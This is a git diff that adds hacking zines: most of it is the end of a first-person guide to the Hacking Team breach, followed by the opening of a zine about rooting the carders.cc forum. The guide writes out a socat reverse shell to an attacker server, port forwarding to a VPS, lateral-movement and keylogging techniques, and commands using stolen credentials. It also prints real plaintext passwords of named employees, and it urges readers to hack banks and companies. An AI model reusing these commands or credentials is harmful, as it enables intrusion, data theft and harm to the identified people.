most likely to accept your connection requests. + +4) Data.com + + Previously known as jigsaw. They have contact information for many + employees. + +5) File Metadata + + A lot of information about employees and their systems can be found in + metadata of files the company has published. Useful tools for finding + files on the company's website and extracting the metadata are metagoofil + [1] and FOCA [2]. + +[1] https://github.com/laramies/metagoofil +[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html + + +--[ 5 - Entering the network ]-------------------------------------------------- + +There are various ways to get a foothold. Since the method I used against +Hacking Team is uncommon and a lot more work than is usually necessary, I'll +talk a little about the two most common ways, which I recommend trying first. + + +----[ 5.1 - Social Engineering ]------------------------------------------------ + +Social engineering, specifically spear phishing, is responsible for the +majority of hacks these days. For an introduction in Spanish, see [1]. For +more information in English, see [2] (the third part, "Targeted Attacks"). For +fun stories about the social engineering exploits of past generations, see +[3]. I didn't want to try to spear phish Hacking Team, as their whole business +is helping governments spear phish their opponents, so they'd be much more +likely to recognize and investigate a spear phishing attempt. + +[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html +[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ +[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf + + +----[ 5.2 - Buying Access ]----------------------------------------------------- + +Thanks to hardworking Russians and their exploit kits, traffic sellers, and +bot herders, many companies already have compromised computers in their +networks. Almost all of the Fortune 500, with their huge networks, have some +bots already inside. However, Hacking Team is a very small company, and most +of it's employees are infosec experts, so there was a low chance that they'd +already been compromised. + + +----[ 5.3 - Technical Exploitation ]-------------------------------------------- + +After the Gamma Group hack, I described a process for searching for +vulnerabilities [1]. Hacking Team had one public IP range: +inetnum: 93.62.139.32 - 93.62.139.47 +descr: HT public subnet + +Hacking Team had very little exposed to the internet. For example, unlike +Gamma Group, their customer support site needed a client certificate to +connect. What they had was their main website (a Joomla blog in which Joomscan +[2] didn't find anything serious), a mail server, a couple routers, two VPN +appliances, and a spam filtering appliance. So, I had three options: look for +a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the +embedded devices. A 0day in an embedded device seemed like the easiest option, +and after two weeks of work reverse engineering, I got a remote root exploit. +Since the vulnerabilities still haven't been patched, I won't give more +details, but for more information on finding these kinds of vulnerabilities, +see [3] and [4]. + +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] http://sourceforge.net/projects/joomscan/ +[3] http://www.devttys0.com/ +[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A + + +--[ 6 - Be Prepared ]----------------------------------------------------------- + +I did a lot of work and testing before using the exploit against Hacking Team. +I wrote a backdoored firmware, and compiled various post-exploitation tools +for the embedded device. The backdoor serves to protect the exploit. Using the +exploit just once and then returning through the backdoor makes it harder to +identify and patch the vulnerabilities. + +The post-exploitation tools that I'd prepared were: + +1) busybox + + For all the standard Unix utilities that the system didn't have. + +2) nmap + + To scan and fingerprint Hacking Team's internal network. + +3) Responder.py + + The most useful tool for attacking windows networks when you have access to + the internal network, but no domain user. + +4) Python + + To execute Responder.py + +5) tcpdump + + For sniffing traffic. + +6) dsniff + + For sniffing passwords from plaintext protocols like ftp, and for + arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR + and NaGA, but it was hard to compile it for the system. + +7) socat + + For a comfortable shell with a pty: + my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port + hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ + tcp:my_server:my_port + + And useful for a lot more, it's a networking swiss army knife. See the + examples section of its documentation. + +8) screen + + Like the shell with pty, it wasn't really necessary, but I wanted to feel + at home in Hacking Team's network. + +9) a SOCKS proxy server + + To use with proxychains to be able to access their local network from any + program. + +10) tgcd + + For forwarding ports, like for the SOCKS server, through the firewall. + +[1] https://www.busybox.net/ +[2] https://nmap.org/ +[3] https://github.com/SpiderLabs/Responder +[4] https://github.com/bendmorris/static-python +[5] http://www.tcpdump.org/ +[6] http://www.monkey.org/~dugsong/dsniff/ +[7] http://www.dest-unreach.org/socat/ +[8] https://www.gnu.org/software/screen/ +[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html +[10] http://tgcd.sourceforge.net/ + + +The worst thing that could happen would be for my backdoor or post-exploitation +tools to make the system unstable and cause an employee to investigate. So I +spent a week testing my exploit, backdoor, and post-exploitation tools in the +networks of other vulnerable companies before entering Hacking Team's network. + + +--[ 7 - Watch and Listen ]------------------------------------------------------ + +Now inside their internal network, I wanted to take a look around and think +about my next step. I started Responder.py in analysis mode (-A to listen +without sending poisoned responses), and did a slow scan with nmap. + + +--[ 8 - NoSQL Databases ]------------------------------------------------------- + +NoSQL, or rather NoAuthentication, has been a huge gift to the hacker +community [1]. Just when I was worried that they'd finally patched all of the +authentication bypass bugs in MySQL [2][3][4][5], new databases came into +style that lack authentication by design. Nmap found a few in Hacking Team's +internal network: + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 47547 +| totalSize = 49856643072 +... +|_ version = 2.6.5 + +27017/tcp open mongodb MongoDB 2.6.5 +| mongodb-databases: +| ok = 1 +| totalSizeMb = 31987 +| totalSize = 33540800512 +| databases +... +|_ version = 2.6.5 + +They were the databases for test instances of RCS. The audio that RCS records +is stored in MongoDB with GridFS. The audio folder in the torrent [6] came +from this. They were spying on themselves without meaning to. + +[1] https://www.shodan.io/search?query=product%3Amongodb +[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql +[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html +[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c +[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html +[6] https://ht.transparencytoolkit.org/audio/ + + +--[ 9 - Crossed Cables ]-------------------------------------------------------- + +Although it was fun to listen to recordings and see webcam images of Hacking +Team developing their malware, it wasn't very useful. Their insecure backups +were the vulnerability that opened their doors. According to their +documentation [1], their iSCSI devices were supposed to be on a separate +network, but nmap found a few in their subnetwork 192.168.1.200/24: + +Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) +... +3260/tcp open iscsi? +| iscsi-info: +| Target: iqn.2000-01.com.synology:ht-synology.name +| Address: 192.168.200.66:3260,0 +|_ Authentication: No authentication required + +Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) +... +3260/tcp open iscsi? +| iscsi-info: +| Target: iqn.2000-01.com.synology:synology-backup.name +| Address: 10.0.1.72:3260,0 +| Address: 192.168.200.72:3260,0 +|_ Authentication: No authentication required + +iSCSI needs a kernel module, and it would've been difficult to compile it for +the embedded system. I forwarded the port so that I could mount it from a VPS: + +VPS: tgcd -L -p 3260 -q 42838 +Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 + +VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 + +Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it +because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 + +The way I solved it was: +iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 + +And now, after: +iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login + +...the device file appears! We mount it: +vmfs-fuse -o ro /dev/sdb1 /mnt/tmp + +and find backups of various virtual machines. The Exchange server seemed like +the most interesting. It was too big too download, but it was possible to +mount it remotely to look for interesting files: +$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk +$ fdisk -l /dev/loop0 +/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT + +so the offset is 2048 * 512 = 1048576 +$ losetup -o 1048576 /dev/loop1 /dev/loop0 +$ mount -o ro /dev/loop1 /mnt/exchange/ + +now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 +we find the hard disk of the VM, and mount it: +vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ +mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 + +...and finally we've unpacked the Russian doll and can see all the files from +the old Exchange server in /mnt/part1 + +[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf + + +--[ 10 - From backups to domain admin ]----------------------------------------- + +What interested me most in the backup was seeing if it had a password or hash +that could be used to access the live server. I used pwdump, cachedump, and +lsadump [1] on the registry hives. lsadump found the password to the besadmin +service account: + +_SC_BlackBerry MDS Connection Service +0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ +0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. +0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!........... + +I used proxychains [2] with the socks server on the embedded device and +smbclient [3] to check the password: +proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' + +It worked! The password for besadmin was still valid, and a local admin. I +used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. +Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and +got a bunch of passwords, including the Domain Admin: + +HACKINGTEAM BESAdmin bes32678!!! +HACKINGTEAM Administrator uu8dd8ndd12! +HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin +HACKINGTEAM m.romeo ioLK/(90 +HACKINGTEAM l.guerra 4luc@=.= +HACKINGTEAM d.martinez W4tudul3sp +HACKINGTEAM g.russo GCBr0s0705! +HACKINGTEAM a.scarafile Cd4432996111 +HACKINGTEAM r.viscardi Ht2015! +HACKINGTEAM a.mino A!e$$andra +HACKINGTEAM m.bettini Ettore&Bella0314 +HACKINGTEAM m.luppi Blackou7 +HACKINGTEAM s.gallucci 1S9i8m4o! +HACKINGTEAM d.milan set!dob66 +HACKINGTEAM w.furlan Blu3.B3rry! +HACKINGTEAM d.romualdi Rd13136f@# +HACKINGTEAM l.invernizzi L0r3nz0123! +HACKINGTEAM e.ciceri 2O2571&2E +HACKINGTEAM e.rabe erab@4HT! + +[1] https://github.com/Neohapsis/creddump7 +[2] http://proxychains.sourceforge.net/ +[3] https://www.samba.org/ +[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf +[5] https://github.com/gentilkiwi/mimikatz + + +--[ 11 - Downloading the mail ]------------------------------------------------- + +With the Domain Admin password, I have access to the email, the heart of the +company. Since with each step I take there's a chance of being detected, I +start downloading their email before continuing to explore. Powershell makes +it easy [1]. Curiously, I found a bug with Powershell's date handling. After +downloading the emails, it took me another couple weeks to get access to the +source code and everything else, so I returned every now and then to download +the new emails. The server was Italian, with dates in the format +day/month/year. I used: +-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} + +with New-MailboxExportRequest to download the new emails (in this case all +mail since June 5). The problem is it says the date is invalid if you +try a day larger than 12 (I imagine because in the US the month comes first +and you can't have a month above 12). It seems like Microsoft's engineers only +test their software with their own locale. + +[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ + + +--[ 12 - Downloading Files ]---------------------------------------------------- + +Now that I'd gotten Domain Admin, I started to download file shares using my +proxy and the -Tc option of smbclient, for example: + +proxychains smbclient '//192.168.1.230/FAE DiskStation' \ + -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' + +I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in +the torrent like that. + + +--[ 13 - Introduction to hacking windows domains ]------------------------------ + +Before continuing with the story of the "weones culiaos" (Hacking Team), I +should give some general knowledge for hacking windows networks. + + +----[ 13.1 - Lateral Movement ]------------------------------------------------- + +I'll give a brief review of the different techniques for spreading withing a +windows network. The techniques for remote execution require the password or +hash of a local admin on the target. By far, the most common way of obtaining +those credentials is using mimikatz [1], especially sekurlsa::logonpasswords +and sekurlsa::msv, on the computers where you already have admin access. The +techniques for "in place" movement also require administrative privileges +(except for runas). The most important tools for privilege escalation are +PowerUp [2], and bypassuac [3]. + +[1] https://adsecurity.org/?page_id=1821 +[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp +[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 + + +Remote Movement: + +1) psexec + + The tried and true method for lateral movement on windows. You can use + psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's + invoke_psexec [4], or the builtin windows command "sc" [5]. For the + metasploit module, powershell empire, and pth-winexe [6], you just need the + hash, not the password. It's the most universal method (it works on any + windows computer with port 445 open), but it's also the least stealthy. + Event type 7045 "Service Control Manager" will appear in the event logs. In + my experience, no one has ever noticed during a hack, but it helps the + investigators piece together what the hacker did afterwards. + +2) WMI + + The most stealthy method. The WMI service is enabled on all windows + computers, but except for servers, the firewall blocks it by default. You + can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and + pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin + wmic [5]. All except wmic just need the hash. + +3) PSRemoting [10] + + It's disabled by default, and I don't recommend enabling new protocols. + But, if the sysadmin has already enabled it, it's very convenient, + especially if you use powershell for everything (and you should use + powershell for almost everything, it will change [11] with powershell 5 and + windows 10, but for now powershell makes it easy to do everything in RAM, + avoid AV, and leave a small footprint) + +4) Scheduled Tasks + + You can execute remote programs with at and schtasks [5]. It works in the + same situations where you could use psexec, and it also leaves a well known + footprint [12]. + +5) GPO + + If all those protocols are disabled or blocked by the firewall, once you're + Domain Admin, you can use GPO to give users a login script, install an msi, + execute a scheduled task [13], or, like we'll see with the computer of + Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and + open the firewall. + +[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx +[2] https://sourceforge.net/projects/winexe/ +[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh +[4] http://www.powershellempire.com/?page_id=523 +[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ +[6] https://github.com/byt3bl33d3r/pth-toolkit +[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py +[8] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[9] http://www.powershellempire.com/?page_id=124 +[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ +[11] https://adsecurity.org/?p=2277 +[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems +[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py + + +"In place" Movement: + +1) Token Stealing + + Once you have admin access on a computer, you can use the tokens of the + other users to access resources in the domain. Two tools for doing this are + incognito [1] and the mimikatz token::* commands [2]. + +2) MS14-068 + + You can take advantage of a validation bug in Kerberos to generate Domain + Admin tickets [3][4][5]. + +3) Pass the Hash + + If you have a user's hash, but they're not logged in, you can use + sekurlsa::pth [2] to get a ticket for the user. + +4) Process Injection + + Any RAT can inject itself into other processes. For example, the migrate + command in meterpreter and pupy [6], or the psinject [7] command in + powershell empire. You can inject into the process that has the token you + want. + +5) runas + + This is sometimes very useful since it doesn't require admin privileges. + The command is part of windows, but if you don't have a GUI you can use + powershell [8]. + +[1] https://www.indetectables.net/viewtopic.php?p=211165 +[2] https://adsecurity.org/?page_id=1821 +[3] https://github.com/bidord/pykek +[4] https://adsecurity.org/?p=676 +[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html +[6] https://github.com/n1nj4sec/pupy +[7] http://www.powershellempire.com/?page_id=273 +[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 + + +----[ 13.2 - Persistence ]------------------------------------------------------ + +Once you have access, you want to keep it. Really, persistence is only a +challenge for assholes like Hacking Team who target activists and other +individuals. To hack companies, persistence isn't needed since companies never +sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple +high-uptime servers. On the off chance that they all reboot at the same time, +I have passwords and a golden ticket [1] as backup access. You can read more +about the different techniques for persistence in windows here [2][3][4]. But +for hacking companies, it's not needed and it increases the risk of detection. + +[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ +[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ +[3] http://www.hexacorn.com/blog/category/autostart-persistence/ +[4] https://blog.netspi.com/tag/persistence/ + + +----[ 13.3 - Internal reconnaissance ]------------------------------------------ + +The best tool these days for understanding windows networks is Powerview [1]. +It's worth reading everything written by it's author [2], especially [3], [4], +[5], and [6]. Powershell itself is also quite powerful [7]. As there are still +many windows 2000 and 2003 servers without powershell, you also have to learn +the old school [8], with programs like netview.exe [9] or the windows builtin +"net view". Other techniques that I like are: + +1) Downloading a list of file names + + With a Domain Admin account, you can download a list of all filenames in + the network with powerview: + + Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | + select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | + select fullname | out-file -append files.txt} + + Later, you can read it at your leisure and choose which files to download. + +2) Reading email + + As we've already seen, you can download email with powershell, and it has a + lot of useful information. + +3) Reading sharepoint + + It's another place where many businesses store a lot of important + information. It can also be downloaded with powershell [10]. + +4) Active Directory [11] + + It has a lot of useful information about users and computers. Without being + Domain Admin, you can already get a lot of info with powerview and other + tools [12]. After getting Domain Admin, you should export all the AD + information with csvde or another tool. + +5) Spy on the employees + + One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi + (one of Hacking Team's sysadmins) gave me access to a Nagios server which + gave me access to the rete sviluppo (development network with the source + code of RCS). With a simple combination of Get-Keystrokes and + Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang + [14], and GPO, you can spy on any employee, or even on the whole domain. + +[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView +[2] http://www.harmj0y.net/blog/tag/powerview/ +[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ +[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ +[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ +[6] http://www.slideshare.net/harmj0y/i-have-the-powerview +[7] https://adsecurity.org/?p=2535 +[8] https://www.youtube.com/watch?v=rpwrKhgMd7E +[9] https://github.com/mubix/netview +[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ +[11] https://adsecurity.org/?page_id=41 +[12] http://www.darkoperator.com/?tag=Active+Directory +[13] https://github.com/PowerShellMafia/PowerSploit +[14] https://github.com/samratashok/nishang + + +--[ 14 - Hunting Sysadmins ]---------------------------------------------------- + +Reading their documentation about their infrastructure [1], I saw that I was +still missing access to something important - the "Rete Sviluppo", an isolated +network with the source code for RCS. The sysadmins of a company always have +access to everything, so I searched the computers of Mauro Romeo and Christian +Pozzi to see how they administer the Sviluppo network, and to see if there +were any other interesting systems I should investigate. It was simple to +access their computers, since they were part of the windows domain where I'd +already gotten admin access. Mauro Romeo's computer didn't have any ports +open, so I opened the port for WMI [2] and executed meterpreter [3]. In +addition to keylogging and screen scraping with Get-Keystrokes and +Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 +[4], and searched for interesting files [5]. Upon seeing that Pozzi had a +Truecrypt volume, I waited until he'd mounted it and then copied off the +files. Many have made fun of Christian Pozzi's weak passwords (and of +Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I +included them in the leak as a false clue, and to laugh at him. The reality is +that mimikatz and keyloggers view all passwords equally. + +[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ +[2] http://www.hammer-software.com/wmigphowto.shtml +[3] https://www.trustedsec.com/june-2015/no_psexec_needed/ +[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde +[5] http://pwnwiki.io/#!presence/windows/find_files.md +[6] http://archive.is/TbaPy +[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ +[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt +[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ + + +--[ 15 - The bridge ]----------------------------------------------------------- + +Within Christian Pozzi's Truecrypt volume, there was a textfile with many +passwords [1]. One of those was for a Fully Automated Nagios server, which had +access to the Sviluppo network in order to monitor it. I'd found the bridge I +needed. The textfile just had the password to the web interface, but there was +a public code execution exploit [2] (it's an unauthenticated exploit, but it +requires that at least one user has a session initiated, for which I used the +password from the textfile). + +[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt +[2] http://seclists.org/fulldisclosure/2014/Oct/78 + + +--[ 16 - Reusing and resetting passwords ]-------------------------------------- + +Reading the emails, I'd seen Daniele Milan granting access to git repos. I +already had his windows password thanks to mimikatz. I tried it on the git +server and it worked. Then I tried sudo and it worked. For the gitlab server +and their twitter account, I used the "forgot my password" function along with +my access to their mail server to reset the passwords. + + +--[ 17 - Conclusion ]----------------------------------------------------------- + +That's all it takes to take down a company and stop their human rights abuses. +That's the beauty and asymmetry of hacking: with 100 hours of work, one person +can undo years of work by a multi-million dollar company. Hacking gives the +underdog a chance to fight and win. + +Hacking guides often end with a disclaimer: this information is for +educational purposes only, be an ethical hacker, don't attack systems you +don't have permission to, etc. I'll say the same, but with a more rebellious +conception of "ethical" hacking. Leaking documents, expropriating money from +banks, and working to secure the computers of ordinary people is ethical +hacking. However, most people that call themselves "ethical hackers" just work +to secure those who pay their high consulting fees, who are often those most +deserving to be hacked. + +Hacking Team saw themselves as part of a long line of inspired Italian design +[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, +and government, as part of a long tradition of Italian fascism. I'd like to +dedicate this guide to the victims of the raid on the Armando Diaz school, and +to all those who have had their blood spilled by Italian fascists. + +[1] https://twitter.com/coracurrier/status/618104723263090688 + + +--[ 18 - Contact ]-------------------------------------------------------------- + +To send me spear phishing attempts, death threats in Italian [1][2], and to +give me 0days or access inside banks, corporations, governments, etc. + +[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ +[2] https://twitter.com/CthulhuSec/status/619459002854977537 + +only encrypted email please: +https://securityinabox.org/es/thunderbird_usarenigmail +-----BEGIN PGP PUBLIC KEY BLOCK----- + +mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx +vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g +27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x ++fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h +VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 +Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh +Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL +BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac +QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf +cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 +JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys +4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 +X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E +VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai +oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm +n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F +Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 +WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo +jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK +CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA +OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR +LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi +JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq +Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB +D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k +=E5+y +-----END PGP PUBLIC KEY BLOCK----- + + + + If not you, who? If not now, when? + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) \ No newline at end of file diff --git a/owned and exposed/1.txt b/owned and exposed/1.txt new file mode 100644 index 0000000..5a0b6bb --- /dev/null +++ b/owned and exposed/1.txt @@ -0,0 +1,6492 @@ + |\___/| + -=[ISSUE - NO 1]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| + FEATURING ~~~ |\ A present + Germanys next Darkmarket ~~~ /()/ brought to you + Carders.cc ~~~`\| by some happy ninjas + + / +*//////{<>===[TABLE OF CONTENTS]=====================================- + \ + +[================[ INTRO ]==-- +[================[ OWNAGE ]==-- +[================[ RM ]==-- +[================[ PASSES ]==-- +[================[ IP'S ]==-- +[================[ OUTRO ]==-- + + / +*//////{<>===[INTRO]=================================================- + \ + +Many of you guys may have noticed this breeding German "underground" +shit called carders.cc. For those who don't: Carders is a marketplace +full of everything that is illegal and bad. Carding, fraud, drugs, +weapons and tons of kiddies. They used to be only a small forum, but +after we erased 1337-crew they got more power. The rats left the +sinking ship. The voices told us to own them since carders is our +fault and we had to fix our flaw. So we did. + +During the ownage they also gave us lulz by showing off their +ridiculous configuration skills which had a specific impact on their +security. They actually managed to chmod and chown nearly everything +to 777 and www-user readable. Including their /root directory. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Zagerus: Zusaetzlich schuetzen auch andere Applikationen wie | +| beispielsweise "suhosin" die Scripte. | +|____________________________________________________________________| + +Ya sure. However, to put it in a nutshell, here is what we've got. O +and don't forget the uncensored database backup that we prepared, +including private messages, passes and their holy priv8 3rd level. + + / +*//////{<>===[OWNAGE]================================================- + \ + +~$ whoami +root + +~$ pwd +/home/carderscc/carders.cc/forum + +~$ ls -lah +total 724 +drwxrwxrwx 9 carderscc www 1.0K May 5 10:42 . +drwxrwx--- 7 carderscc www 2.0K May 2 06:09 .. +-rwxr-xr-x 1 root www 374B Apr 24 18:06 .htaccess +-rwxr-xr-x 1 root www 838B May 5 10:42 1ajax-banner.php +drwxrwxrwx 4 carderscc www 512B May 3 02:12 Packages +-rwxrwxrwx 1 carderscc www 76K May 2 14:20 SSI.php +-rwxrwxrwx 1 carderscc www 3.7K Apr 29 19:43 Settings.php +-rwxrwxrwx 1 carderscc www 3.7K May 3 02:08 Settings_bak.php +drwxrwxrwx 6 carderscc www 512B May 3 08:19 Smileys +drwxrwxrwx 2 carderscc www 4.0K May 3 02:12 Sources +drwxrwxrwx 7 carderscc www 512B May 4 20:22 Themes +-rwxrwxrwx 1 carderscc www 17K May 3 06:39 agreement.txt +drwxrwxrwx 2 carderscc www 61K May 5 10:55 attachments +drwxrwxrwx 4 carderscc www 512B Apr 25 05:39 avatars +-rwxr-xr-x 1 root www 80K May 2 14:06 backup.SSI.php +drwxrwxrwx 2 carderscc www 2.5K Apr 29 20:06 cache +-rwxrwxrwx 1 carderscc www 598B Apr 26 15:37 checkit.php +-rwxrwxrwx 1 root www 16K Apr 29 15:22 index.php +-rwxrwxrwx 1 carderscc www 3.9K Apr 25 12:55 license.txt +-rwxrwxrwx 1 carderscc www 2.6K Apr 25 12:55 news_readme.html +-rwxrwxrwx 1 carderscc www 12K Apr 25 12:55 readme.html +-rwxrwxrwx 1 carderscc www 31K Apr 27 06:15 